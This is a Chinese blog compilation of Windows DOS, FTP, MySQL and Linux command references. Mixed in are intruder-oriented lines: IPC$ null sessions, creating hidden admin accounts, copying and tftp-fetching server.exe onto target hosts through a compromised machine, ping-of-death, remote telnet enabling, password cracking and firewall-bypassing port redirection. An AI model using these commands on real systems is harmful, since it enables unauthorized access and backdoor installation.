user-name[password][account]：向遠程主機表明自己的身份，需要口令時，必須輸入口令， 如：user anonymous my@email。 72.verbose：同 -v 參數，即設置詳盡報告方式，ftp 服務器的所有響應都將顯示給用戶，缺省為on. 73.?[cmd]： 同 help.

telent

? ? ? ??telent 詳解

tasklist

? ? ? ? 描述:該工具顯示在本地或遠程機器上當前運行的進程列表。

? ? ? ? 在Windows XP中新增了兩個命令行工具“tasklist、taskkill”。通過“Ctrl+Alt+Del”組合鍵，打開“任務管理器”就可以查看到本機完整的進程列表，而且可以通過手工定制進程列表的方式獲的更多的進程信息，如會話ID、用戶名等，遺憾的是，我們查看不到這些進程到底提供了哪些系統服務。而tasklist、taskkill兩個工具就能實現上面所說的功能。

? ? ? ? “Tasklist”命令用來顯示運行在本地或遠程計算機上的所有進程的命令行工具，帶有多個執行參數。它的格式為

TASKLIST [/S system [/U username [/P [password]]]][/M [module] | /SVC | /V] [/FI filter] [/FO format] [/NH]參數列表:/S system 指定連接到的遠程系統。/U [domain\]user 指定應該在哪個用戶上下文執行這個命令。/P [password] 為提供的用戶上下文指定密碼。如果省略，則提示輸入。/M [module] 列出當前使用所給 exe/dll 名稱的所有任務。如果沒有指定模塊名稱，顯示所有加載的模塊。/SVC 顯示每個進程中主持的服務。/V 顯示詳述任務信息。/FI filter 顯示一系列符合篩選器指定的標準的任務。/FO format 指定輸出格式。有效值: "TABLE"、"LIST"、"CSV"。/NH 指定列標題不應該在輸出中顯示。只對 "TABLE" 和 "CSV" 格式有效。/? 顯示幫助消息。篩選器:篩選器名 有效操作符 有效值----------- --------------- --------------------------STATUS eq, ne RUNNING | NOT RESPONDING | UNKNOWNIMAGENAME eq, ne 映像名稱PID eq, ne, gt, lt, ge, le PID 值SESSION eq, ne, gt, lt, ge, le 會話編號SESSIONNAME eq, ne 會話名CPUTIME eq, ne, gt, lt, ge, le CPU 時間，格式為：hh:mm:ss。hh - 時，mm - 分，ss - 秒MEMUSAGE eq, ne, gt, lt, ge, le 內存使用量，單位為 KBUSERNAME eq, ne 用戶名，格式為 [domain\]userSERVICES eq, ne 服務名稱WINDOWTITLE eq, ne 窗口標題MODULES eq, ne DLL 名稱說明: 當查詢遠程機器時，不支持 "WINDOWTITLE" 和 "STATUS"篩選器。示例:TASKLISTTASKLIST /MTASKLIST /V /FO CSVTASKLIST /SVC /FO LISTTASKLIST /M wbem*TASKLIST /S system /FO LISTTASKLIST /S system /U domain\username /FO CSV /NHTASKLIST /S system /U username /P password /FO TABLE /NHTASKLIST /FI "USERNAME ne NT AUTHORITY\SYSTEM" /FI "STATUS eq running"

　　1、使用“Tasklist”命令查看本機進程
　　?在DOS命令提示符下輸入：“tasklist”命令，就可顯示本機的所有進程。本機的顯示結果由五部分組成：圖像名（進程名）、PID、會話名、會話＃、內存使用。

　　2、查看遠程系統的進程
　　?在命令提示符下輸入：“tasklist? /s? 218.22.123.26? /u? jtdd? /p? 12345678”（不包括引號）。其中/s參數后的“218.22.123.26”指要查看的遠程系統的IP地址，/u后的“jtdd”指tasklist命令使用的用戶帳號，它是遠程系統上的一個合法帳號，/p后的“12345678”指jtdd帳號的密碼。這樣，通過上面的命令，我們就可以查看到遠程系統的進程了。
　　小提示：使用tasklist命令查看遠程系統的進程時，需要遠程機器的RPC 服務器的支持，否則，該命令就不能正常使用。

　　3、查看系統進程提供的服務
　　tasklist命令不但可以查看系統進程，而且還可以查看每個進程提供的服務。如查看本機的進程“SVCHOST.EXE”提供的服務，在命令提示符下輸入：“tasklist? /svc”命令即可，你會驚奇的發現，有四個“SVCHOST.EXE”進程，原來有二十幾項服務使用這個進程，對于遠程系統來說，查看系統服務也很簡單，使用“tasklist? /s? 218.22.123.26? /u? jtdd? /p? 12345678? /svc”命令，就可以查看IP地址為“218.22.123.26”的遠程系統進程所提供的服務。

　　4、查看調用DLL模塊文件的進程列表
　　例如，我們要查看本地系統中哪些進程調用了“shell32.dll” DLL模塊文件。在命令提示符下輸入： tasklist? /m? shell32.dll　這時系統將顯示調用進程列表。?

　　5、使用篩選器查找指定的進程?
　　在命令提示符下輸入：“TASKLIST?? /FI??? "USERNAME ne NT AUTHORITY\SYSTEM"???? /FI "STATUS eq running“
　　這樣就列出了系統中正在運行的非“SYSTEM“狀態的所有進程。其中“/FI“為篩選器參數，” ne“和”eq“為關系運算符”不相等“和”相等。

　　談到“Tasklist”命令，就不得不提及它的孿生兄弟“taskkill”命令，顧名思義，它是用來殺死進程的。
　　如要殺死本機的“notepad.exe”進程。首先，使用Tasklist查找它的PID,系統顯示本機“notepad.exe”進程的PID值為“1132“，然后運行“taskkill? /pid 1132”即可,或者運行 “taskkill? /IM? notepad.exe”也可，其中” /pid “參數后面跟要終止進程的PID值，“/IM“參數后面為進程的圖像名。

taskkill

? ? 描述: 使用該工具按照進程 ID (PID) 或映像名稱終止任務。

TASKKILL [/S system [/U username [/P [password]]]]{ [/FI filter] [/PID processid | /IM imagename] } [/T] [/F]參數列表:/S system 指定要連接的遠程系統。/U [domain\]user 指定應該在哪個用戶上下文執行這個命令。/P [password] 為提供的用戶上下文指定密碼。如果忽略，提示輸入。/FI filter 應用篩選器以選擇一組任務。允許使用 "*"。例如，映像名稱 eq acme*/PID processid 指定要終止的進程的 PID。使用 TaskList 取得 PID。/IM imagename 指定要終止的進程的映像名稱。通配符 '*'可用來指定所有任務或映像名稱。/T 終止指定的進程和由它啟用的子進程。/F 指定強制終止進程。/? 顯示幫助消息。篩選器:篩選器名 有效運算符 有效值----------- --------------- -------------------------STATUS eq, ne RUNNING | NOT RESPONDING | UNKNOWNIMAGENAME eq, ne 映像名稱PID eq, ne, gt, lt, ge, le PID 值SESSION eq, ne, gt, lt, ge, le 會話編號。CPUTIME eq, ne, gt, lt, ge, le CPU 時間，格式為：hh:mm:ss。 hh - 時，mm - 分，ss - 秒MEMUSAGE eq, ne, gt, lt, ge, le 內存使用量，單位為 KBUSERNAME eq, ne 用戶名，格式為 [domain\]userMODULES eq, ne DLL 名稱SERVICES eq, ne 服務名稱WINDOWTITLE eq, ne 窗口標題說明----1) 只有在應用篩選器的情況下，/IM 切換才能使用通配符 '*'。2) 遠程進程總是要強行 (/F) 終止。3) 當指定遠程機器時，不支持 "WINDOWTITLE" 和 "STATUS" 篩選器。例如:TASKKILL /IM notepad.exeTASKKILL /PID 1230 /PID 1241 /PID 1253 /TTASKKILL /F /IM cmd.exe /T TASKKILL /F /FI "PID ge 1000" /FI "WINDOWTITLE ne untitle*"TASKKILL /F /FI "USERNAME eq NT AUTHORITY\SYSTEM" /IM notepad.exeTASKKILL /S system /U domain\username /FI "USERNAME ne NT*" /IM *TASKKILL /S system /U username /P password /FI "IMAGENAME eq note*"

基本的用法就是：Taskkill /pid ****(pid號)
至于eq，ne，ge，le，gt，lt，是等于，不等于，不小于，不大于，大于，小于意思，主要是用來終止一組進程的，不過這個參數可以通過多組taskkill 來實現。
/F是強制命令。

DOS命令大全(經典收藏)

net use \\ip\ipc$ " " /user:" " 建立IPC空鏈接 net use \\ip\ipc$ "密碼" /user:"用戶名" 建立IPC非空鏈接 net use h: \\ip\c$ "密碼" /user:"用戶名" 直接登陸后映射對方C：到本地為H: net use h: \\ip\c$ 登陸后映射對方C：到本地為H: net use \\ip\ipc$ /del 刪除IPC鏈接 net use h: /del 刪除映射對方到本地的為H:的映射 net user 查看有哪些用戶 net user 帳戶名 查看帳戶的屬性 net user 用戶名　密碼　/add 建立用戶 net user 用戶名 /delete 刪除用戶 net user guest /active:yes 激活guest用戶 net password 密碼 更改系統登陸密碼 net user guest 12345 用guest用戶登陸后用將密碼改為12345 net user guest lovechina 把guest的密碼改為lovechina net localgroup administrators 用戶名 /add 把"用戶"添加到管理員中使其具有管理員權限,注意：administrator后加s用復數 net user heibai lovechina /add 加一個heibai的用戶密碼為lovechina net localgroup Administrators heibai /add 把他加入Administrator組net user guest/time:m-f,08:00-17:00 表示guest用戶登錄時間為周一至周五的 net user guest/time:m,4am-5pm;t,1pm-3pm;w-f,8:00-17:00 表示guest用戶登錄時間為周一4:00/17:00,周二13:00/15:00,周三至周五8:00/17:00. net user guest/time:all 表示沒有時間限制. net user guest/time 表示guest用戶永遠不能登錄. 但是只能限制登陸時間，不是上網時間net start 查看開啟了哪些服務 net start 服務名　 開啟服務；(如:net start telnet， net start schedule) net start telnet 打開TELNET服務 net stop 服務名 停止某服務 net time \\目標ip 查看對方時間 net time \\目標ip /set 設置本地計算機時間與"目標IP"主機的時間同步,加上參數/yes可取消確認信息 net view 查看本地局域網內開啟了哪些共享 net view \\ip 查看對方局域網內開啟了哪些共享 net config 顯示系統網絡設置 net logoff 斷開連接的共享 net pause 服務名 暫停某服務 net send ip "文本信息" 向對方發信息 net ver 局域網內正在使用的網絡連接類型和信息 net share 查看本地開啟的共享 net share ipc$ 開啟ipc$共享 net share ipc$ /del 刪除ipc$共享 net share c$ /del 刪除C:共享 netstat -a 查看開啟了哪些端口,常用netstat -an netstat -n 查看端口的網絡連接情況，常用netstat -an netstat -v 查看正在進行的工作 netstat -p 協議名 例：netstat -p tcq/ip 查看某協議使用情況（查看tcp/ip協議使用情況） netstat -s 查看正在使用的所有協議使用情況 nbtstat -A ip 對方136到139其中一個端口開了的話，就可查看對方最近登陸的用戶名（03前的為用戶名）-注意：參數-A要大寫 tracert -參數 ip(或計算機名) 跟蹤路由（數據包），參數：“-w數字”用于設置超時間隔。 ping ip(或域名) 向對方主機發送默認大小為32字節的數據，參數：“-l[空格]數據包大小”；“-n發送數據次數”；“-t”指一直ping。 ping -t -l 65550 ip 死亡之ping(發送大于64K的文件并一直ping就成了死亡之ping) ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用參數“/all”顯示全部配置信息 tlist -t 以樹行列表顯示進程(為系統的附加工具，默認是沒有安裝的，在安裝目錄的Support/tools文件夾內) kill -F 進程名 加-F參數后強制結束某進程(為系統的附加工具，默認是沒有安裝的，在安裝目錄的Support/tools文件夾內) del -F 文件名 加-F參數后就可刪除只讀文件,/AR、/AH、/AS、/AA分別表示刪除只讀、隱藏、系統、存檔文件，/A-R、/A-H、/A-S、/A-A表示刪除除只讀、隱藏、系統、存檔以外的文件。例如“DEL/AR *.*”表示刪除當前目錄下所有只讀文件，“DEL/A-S *.*”表示刪除當前目錄下除系統文件以外的所有文件

del /S /Q 目錄 或用：rmdir /s /Q 目錄 /S 刪除目錄及目錄下的所有子目錄和文件。同時使用參數/Q 可取消刪除操作時的系統確認就直接刪除。（二個命令作用相同） move 盤符路徑要移動的文件名　存放移動文件的路徑移動后文件名 移動文件,用參數/y將取消確認移動目錄存在相同文件的提示就直接覆蓋 fc one.txt two.txt > 3st.txt 對比二個文件并把不同之處輸出到3st.txt文件中，"> "和"> >" 是重定向命令 at id號 開啟已注冊的某個計劃任務 at /delete 停止所有計劃任務，用參數/yes則不需要確認就直接停止 at id號 /delete 停止某個已注冊的計劃任務 at 查看所有的計劃任務 at ip time 程序名(或一個命令) /r 在某時間運行對方某程序并重新啟動計算機 finger username @host 查看最近有哪些用戶登陸 telnet ip 端口 遠程登陸服務器,默認端口為23 open ip 連接到IP（屬telnet登陸后的命令） telnet 在本機上直接鍵入telnet 將進入本機的telnet copy 路徑文件名1　 路徑文件名2 /y 復制文件1到指定的目錄為文件2，用參數/y就同時取消確認你要改寫一份現存目錄文件 copy c:srv.exe ipadmin$ 復制本地c:srv.exe到對方的admin下 cppy 1st.jpg/b+2st.txt/a 3st.jpg 將2st.txt的內容藏身到1st.jpg中生成3st.jpg新的文件，注：2st.txt文件頭要空三排，參數：/b指二進制文件，/a指ASCLL格式文件 copy ipadmin$svv.exe c: 或:copyipadmin$*.* 復制對方admini$共享下的srv.exe文件（所有文件）至本地C： xcopy 要復制的文件或目錄樹　目標地址目錄名 復制文件和目錄樹，用參數/Y將不提示覆蓋相同文件 tftp -i 自己IP(用肉機作跳板時這用肉機IP) get server.exe c:server.exe 登陸后，將“IP”的server.exe下載到目標主機c:server.exe 參數：-i指以二進制模式傳送，如傳送exe文件時用，如不加-i 則以ASCII模式（傳送文本文件模式）進行傳送 tftp -i 對方IP　put c:server.exe 登陸后，上傳本地c:server.exe至主機 ftp ip 端口 用于上傳文件至服務器或進行文件操作，默認端口為21。bin指用二進制方式傳送（可執行文件進）；默認為ASCII格式傳送(文本文件時) route print 顯示出IP路由，將主要顯示網絡地址Network addres，子網掩碼Netmask，網關地址Gateway addres，接口地址Interface arp 查看和處理ARP緩存，ARP是名字解析的意思，負責把一個IP解析成一個物理性的MAC地址。arp -a將顯示出全部信息 start 程序名或命令 /max 或/min 新開一個新窗口并最大化（最小化）運行某程序或命令 mem 查看cpu使用情況 attrib 文件名(目錄名) 查看某文件（目錄）的屬性 attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存檔，只讀，系統，隱藏 屬性；用＋則是添加為某屬性 dir 查看文件，參數：/Q顯示文件及目錄屬系統哪個用戶，/T:C顯示文件創建時間，/T:A顯示文件上次被訪問時間，/T:W上次被修改時間 date /t 、 time /t 使用此參數即“DATE/T”、“TIME/T”將只顯示當前日期和時間，而不必輸入新日期和時間 set 指定環境變量名稱=要指派給變量的字符 設置環境變量 set 顯示當前所有的環境變量 set p(或其它字符) 顯示出當前以字符p(或其它字符)開頭的所有環境變量 pause 暫停批處理程序，并顯示出：請按任意鍵繼續.... if 在批處理程序中執行條件處理（更多說明見if命令及變量） goto 標簽 將cmd.exe導向到批處理程序中帶標簽的行（標簽必須單獨一行，且以冒號打頭，例如：“：start”標簽） call 路徑批處理文件名 從批處理程序中調用另一個批處理程序 （更多說明見call /?） for 對一組文件中的每一個文件執行某個特定命令（更多說明見for命令及變量） echo on或off 打開或關閉echo，僅用echo不加參數則顯示當前echo設置 echo 信息 在屏幕上顯示出信息 echo 信息 >> pass.txt 將"信息"保存到pass.txt文件中 findstr "Hello" aa.txt 在aa.txt文件中尋找字符串hello find 文件名 查找某文件 title 標題名字 更改CMD窗口標題名字 color 顏色值 設置cmd控制臺前景和背景顏色；0＝黑、1＝藍、2＝綠、3＝淺綠、4＝紅、5＝紫、6＝黃、7=白、8=灰、9=淡藍、A＝淡綠、B=淡淺綠、C=淡紅、D=淡紫、E=淡黃、F=亮白 prompt 名稱 更改cmd.exe的顯示的命令提示符(把C:、D:統一改為：EntSky )

ver 在DOS窗口下顯示版本信息 winver 彈出一個窗口顯示版本信息（內存大小、系統版本、補丁版本、計算機名） format 盤符 /FS:類型 格式化磁盤,類型:FAT、FAT32、NTFS ,例：Format D: /FS:NTFS md　目錄名 創建目錄 replace 源文件　 要替換文件的目錄 替換文件 ren 原文件名　新文件名 重命名文件名 tree 以樹形結構顯示出目錄，用參數-f 將列出第個文件夾中文件名稱 type 文件名 顯示文本文件的內容 more 文件名 逐屏顯示輸出文件 doskey 要鎖定的命令＝字符 doskey 要解鎖命令= 為DOS提供的鎖定命令(編輯命令行，重新調用win2k命令，并創建宏)。如：鎖定dir命令：doskey dir=entsky (不能用doskey dir=dir)；解鎖：doskey dir= taskmgr 調出任務管理器 chkdsk /F D: 檢查磁盤D并顯示狀態報告；加參數/f并修復磁盤上的錯誤 tlntadmn telnt服務admn,鍵入tlntadmn選擇3，再選擇8,就可以更改telnet服務默認端口23為其它任何端口 exit 退出cmd.exe程序或目前，用參數/B則是退出當前批處理腳本而不是cmd.exe path 路徑可執行文件的文件名 為可執行文件設置一個路徑。 cmd 啟動一個win2K命令解釋窗口。參數：/eff、/en 關閉、開啟命令擴展；更我詳細說明見cmd /? regedit /s 注冊表文件名 導入注冊表；參數/S指安靜模式導入，無任何提示； regedit /e 注冊表文件名 導出注冊表 cacls 文件名　參數 顯示或修改文件訪問控制列表（ACL）——針對NTFS格式時。參數：/D 用戶名:設定拒絕某用戶訪問；/P 用戶名:perm 替換指定用戶的訪問權限；/G 用戶名:perm 賦予指定用戶訪問權限；Perm 可以是: N 無，R 讀取， W 寫入， C 更改(寫入)，F 完全控制；例：cacls D: est.txt /D pub 設定d: est.txt拒絕pub用戶訪問。 cacls 文件名 查看文件的訪問用戶權限列表 REM 文本內容 在批處理文件中添加注解 netsh 查看或更改本地網絡配置情況

IIS服務命令： iisreset /reboot 重啟win2k計算機（但有提示系統將重啟信息出現） iisreset /start或stop 啟動（停止）所有Internet服務 iisreset /restart 停止然后重新啟動所有Internet服務 iisreset /status 顯示所有Internet服務狀態 iisreset /enable或disable 在本地系統上啟用（禁用）Internet服務的重新啟動 iisreset /rebootonerror 當啟動、停止或重新啟動Internet服務時，若發生錯誤將重新開機 iisreset /noforce 若無法停止Internet服務，將不會強制終止Internet服務 iisreset /timeout Val在到達逾時間（秒）時，仍未停止Internet服務，若指定/rebootonerror參數，則電腦將會重新開機。預設值為重新啟動20秒，停止60秒，重新開機0秒。

FTP 命令： (后面有詳細說明內容) ftp的命令行格式為: ftp －v －d －i －n －g[主機名] －v 顯示遠程服務器的所有響應信息。 －d 使用調試方式。 －n 限制ftp的自動登錄,即不使用.netrc文件。 －g 取消全局文件名。 help [命令] 或 ？[命令] 查看命令說明 bye 或 quit 終止主機FTP進程,并退出FTP管理方式. pwd 列出當前遠端主機目錄 put 或 send 本地文件名 [上傳到主機上的文件名] 將本地一個文件傳送至遠端主機中 get 或 recv [遠程主機文件名] [下載到本地后的文件名] 從遠端主機中傳送至本地主機中 mget [remote-files] 從遠端主機接收一批文件至本地主機 mput local-files 將本地主機中一批文件傳送至遠端主機 dir 或 ls [remote-directory] [local-file] 列出當前遠端主機目錄中的文件.如果有本地文件,就將結果寫至本地文件 ascii 設定以ASCII方式傳送文件(缺省值) bin 或 image 設定以二進制方式傳送文件 bell 每完成一次文件傳送,報警提示 cdup 返回上一級目錄 close 中斷與遠程服務器的ftp會話(與open對應) open host[port] 建立指定ftp服務器連接,可指定連接端口 delete 刪除遠端主機中的文件 mdelete [remote-files] 刪除一批文件 mkdir directory-name 在遠端主機中建立目錄 rename [from] [to] 改變遠端主機中的文件名 rmdir directory-name 刪除遠端主機中的目錄 status 顯示當前FTP的狀態 system 顯示遠端主機系統類型 user user-name [password] [account] 重新以別的用戶名登錄遠端主機 open host [port] 重新建立一個新的連接 prompt 交互提示模式 macdef 定義宏命令 lcd 改變當前本地主機的工作目錄,如果缺省,就轉到當前用戶的HOME目錄 chmod 改變遠端主機的文件權限 case 當為ON時,用MGET命令拷貝的文件名到本地機器中,全部轉換為小寫字母 cd remote－dir 進入遠程主機目錄 cdup 進入遠程主機目錄的父目錄 ! 在本地機中執行交互shell，exit回到ftp環境,如!ls＊.zip

MYSQL 命令： mysql -h主機地址 -u用戶名 －p密碼 連接MYSQL;如果剛安裝好MYSQL，超級用戶root是沒有密碼的。 （例：mysql -h110.110.110.110 -Uroot -P123456 注:u與root可以不用加空格，其它也一樣） exit 退出MYSQL mysqladmin -u用戶名 -p舊密碼 password 新密碼 修改密碼 grant select on 數據庫.* to 用戶名@登錄主機 identified by "密碼"; 增加新用戶。（注意：和上面不同，下面的因為是MYSQL環境中的命令，所以后面都帶一個分號作為命令結束符） show databases; 顯示數據庫列表。剛開始時才兩個數據庫：mysql和test。mysql庫很重要它里面有MYSQL的系統信息，我們改密碼和新增用戶，實際上就是用這個庫進行操作。 use mysql； show tables; 顯示庫中的數據表 describe 表名; 顯示數據表的結構 create database 庫名; 建庫 use 庫名； create table 表名 (字段設定列表)； 建表 drop database 庫名; drop table 表名； 刪庫和刪表 delete from 表名; 將表中記錄清空 select * from 表名; 顯示表中的記錄 mysqldump --opt school>school.bbb 備份數據庫：（命令在DOS的mysql in目錄下執行）;注釋:將數據庫school備份到school.bbb文件，school.bbb是一個文本文件，文件名任取，打開看看你會有新發現。 win2003系統下新增命令（實用部份）： shutdown /參數 關閉或重啟本地或遠程主機。 參數說明：/S 關閉主機，/R 重啟主機， /T 數字 設定延時的時間，范圍0～180秒之間， /A取消開機，/M //IP 指定的遠程主機。 例：shutdown /r /t 0 立即重啟本地主機（無延時） taskill /參數 進程名或進程的pid 終止一個或多個任務和進程。 參數說明：/PID 要終止進程的pid,可用tasklist命令獲得各進程的pid，/IM 要終止的進程的進程名，/F 強制終止進程，/T 終止指定的進程及他所啟動的子進程。 tasklist 顯示當前運行在本地和遠程主機上的進程、服務、服務各進程的進程標識符(PID)。 參數說明：/M 列出當前進程加載的dll文件，/SVC 顯示出每個進程對應的服務，無參數時就只列出當前的進程。

Linux系統下基本命令： 要區分大小寫 uname 顯示版本信息（同win2K的 ver） dir 顯示當前目錄文件,ls -al 顯示包括隱藏文件（同win2K的 dir） pwd 查詢當前所在的目錄位置 cd cd　..回到上一層目錄，注意cd 與..之間有空格。cd　/返回到根目錄。 cat 文件名 查看文件內容 cat >abc.txt 往abc.txt文件中寫上內容。 more 文件名 以一頁一頁的方式顯示一個文本文件。 cp 復制文件 mv 移動文件 rm 文件名 刪除文件，rm -a 目錄名刪除目錄及子目錄 mkdir 目錄名 建立目錄 rmdir 刪除子目錄，目錄內沒有文檔。 chmod 設定檔案或目錄的存取權限 grep 在檔案中查找字符串 diff 檔案文件比較 find 檔案搜尋 date 現在的日期、時間 who 查詢目前和你使用同一臺機器的人以及Login時間地點 w 查詢目前上機者的詳細資料 whoami 查看自己的帳號名稱 groups 查看某人的Group passwd 更改密碼 history 查看自己下過的命令 ps 顯示進程狀態 kill 停止某進程 gcc 黑客通常用它來編譯C語言寫的文件 su 權限轉換為指定使用者 telnet IP telnet連接對方主機（同win2K），當出現bash$時就說明連接成功。 ftp ftp連接上某服務器（同win2K）

系統外部命令

使用系統外部命令時，均需下載相關工具

1、瑞士軍刀：nc.exe

2、掃錨工具：xscan.exe

3、命令行方式嗅探器: xsniff.exe

4、終端服務密碼破解: tscrack.exe

5、其它：?
Shutdown.exe?
Shutdown IP地址 t:20 20秒后將對方NT自動關閉（Windows 2003系統自帶工具，在Windows2000下用進就得下載此工具才能用。在前面Windows 2003 DOS命令中有詳細介紹。）?
fpipe.exe (TCP端口重定向工具) 在第二篇中有詳細說明（端口重定向繞過防火墻）?
fpipe -l 80 -s 1029 -r 80 www.sina.com.cn 當有人掃錨你的80端口時，他掃到的結果會完全是www.sina.com.cn的主機信息?
Fpipe -l 23 -s 88 -r 23 目標IP 把本機向目標IP發送的23端口Telnet請求經端口重定向后，就通過88端口發送到目標IP的23端口。（與目標IP建立Telnet時本機就用的88端口與其相連接）然后：直接Telnet 127.0.0.1（本機IP）就連接到目標IP的23端口了。?
OpenTelnet.exe (遠程開啟telnet工具)?
opentelnet.exe IP 帳號　密碼　ntlm認證方式　Telnet端口 （不需要上傳ntlm.exe破壞微軟的身份驗證方式）直接遠程開啟對方的telnet服務后，就可用telnet ip 連接上對方。?
NTLM認證方式：０：不使用NTLM身份驗證；１：先嘗試NTLM身份驗證，如果失敗，再使用用戶名和密碼；２：只使用NTLM身份驗證。?
ResumeTelnet.exe (OpenTelnet附帶的另一個工具)?
resumetelnet.exe IP　帳號　密碼 用Telnet連接完對方后，就用這個命令將對方的Telnet設置還原，并同時關閉Telnet服務。?

總結

以上是生活随笔為你收集整理的DOS 命令、必会的 10个 DOS 命令的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。